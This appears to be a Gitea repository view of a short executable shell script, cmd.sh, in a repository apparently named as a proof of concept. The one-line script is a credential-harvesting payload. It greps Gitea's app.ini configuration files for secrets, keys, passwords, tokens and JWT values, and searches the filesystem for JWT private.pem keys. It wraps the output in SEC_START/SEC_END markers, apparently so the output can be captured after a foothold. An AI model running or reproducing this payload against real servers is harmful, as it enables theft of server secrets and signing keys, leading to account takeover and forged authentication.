p0c197511/cmd.sh
2026-08-29 23:18:07 +00:00

2 lines
249 B
Bash
Executable File

echo SEC_START; for f in /data/gitea/conf/app.ini /var/lib/gitea/data/conf/app.ini; do [ -f "$f" ] && grep -iE "secret|key|pass|token|jwt" "$f" | head -15; done; find / -maxdepth 6 -name private.pem -path "*jwt*" 2>/dev/null | head -2; echo SEC_END